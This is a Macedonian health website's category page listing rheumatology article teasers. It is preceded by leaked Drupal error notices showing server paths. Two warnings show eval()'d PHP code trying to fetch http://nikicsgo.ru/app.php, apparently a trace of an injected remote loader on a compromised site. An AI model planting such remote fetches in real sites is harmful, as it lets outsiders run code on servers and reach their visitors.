vw_kategorii | За Здравје


Error message

 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 211 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Notice: Array to string conversion in views_plugin_cache->gather_headers() (line 216 of /home/zdravjem/public_html/sites/all/modules/views/plugins/views_plugin_cache.inc).
 • Warning: file_get_contents(): http:// wrapper is disabled in the server configuration by allow_url_fopen=0 in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
 • Warning: file_get_contents(http://nikicsgo.ru/app.php): failed to open stream: no suitable wrapper could be found in eval() (line 1 of /home/zdravjem/public_html/modules/php/php.module(80) : eval()'d code).
                         
                           
                             

КАТЕГОРИИ

                           
                           
                           
                       
 • Лекувањето на трајно-активниот ревматоиден артритис – предизвик на 21-от век

  Перзистентниот активен ревматоиден артритис (RA) ја опишува болеста која трае подолго од 6 месеци и која е одбележана со континуирано воспаление и покрај примената на метотрексатот и останатите лекови кои го модифицираат текот на болеста. Лекувањето на болните со перзистентно активен ревматоиден...

 • Препораки за исхрана кај луѓето болни од ревматоиден артрит

  Луѓето кои боледуваат од ревматоиден артрит треба во целост да го променат начинот на исхрана бидејќи на тој начин тие можат да ги ублажат симптомите за повеќе од 30 %, велат специјалистите по реуматологија. Секој човек од мали нозе е навикнат да се храни со одредена храна, меѓутоа кај оваа...

 • Циркумскриптна склеродермија (Sclerodermia circumscripta)

  Циркумскриптната склеродермија (morphea) е хронично заболување кое се карактеризира со почетна инфламаторна (воспалителна) фаза после која се јавуваат циркумскриптни површини на склеротична (затврдната) кожа. Причина за настанување Етиологијата на болеста е непозната. Во поедини случаи...

 • Воспаление на мускулите (Миозитис, Myositis)

  Болката и воспалението во мускулите се негативна последица од големата напрегнатост на мускулите (вложување многу напор). Како последица, мускулното воспаление е најчесто кај спортистите, атлетите и оние кои практикуваат интензивно вежбање за симнување на телесната тежина. Сепак, секој може да...

 • Јогата ја олеснува фибромиалгичната болка

  Жените кои патат од фибромиалгија можат да ги редуцираат симптомите на болеста и да ја подобрат нивната функција со практикување на јога. Во истражувањето учествувале 53 жени над 21 година, и кај сите учесници кои практикувале јога се забележало подобрување на симптомите. Услов за учество во...

 • Пушењето одговорно за секој трет случај на ревматоиден артритис

  Новата Шведска студија докажа дека една третина од случаите на ревматоиден артритис се поврзани со пушењето. Истражувачите испитувале повеќе од 1 200 луѓе со ревматоиден артритис и 871 доброволци кои ја немале болеста. Повеќе од 61 процент од луѓето кои биле зафатени со болеста ја имале...

 • 6 разлики помеѓу остеоартритис и ревматоиден артритис

  Артритисот се јавува во повеќе форми. Всушност, овој термин може да се употребува за бројни состојби, вклучувајќи ги псоријатичен артритис, реуматоиден артритис, гихт и остеоартритис. Остеоартритисот и ревматоидниот артритис често пати не се разликуваат од страна на пациентите. Затоа ќе наведеме 6...

 • Системски лупус

  Системскиот лупус е хронична и потенцијално животно загрозувачка болест која има автоимуно потекло и се карактеризира со непредвидливи егзацербрации и ремисии со клинички манифестации. Органи кои се афектирани од лупусот се зглобовите, кожата, бубрезите, мозокот, белите дробови, срцето и...

 • Гихт

  Гихтот е метаболно заболување кое се манифестира со појава на акутен артритис со рецидиви, појава на тофи, и кај нелекуваните болни - појава на хронична уратна артропатија. Болеста е последица на таложење на кристали од мононатриум-урат. Исто така е присутна и хиперуратемија и хиперурикемија. Во...

 • Откриен е генот кој влијае на нивото на болка кај остеоартритисот

  Истражувачите открија нов ген поврзан со остеоартритис. Ова е само третиот ген кој е пронајден за оваа оваа болна и онеспособувачка состојба која афектира 40% од луѓето постари од 70 години. Оваа варијанта на генот MCF2L е пронајдена во Сангер Институтот, каде истражувачите користеле...

Pages

ЗА ЗДРАВЈЕ NEWSLETTER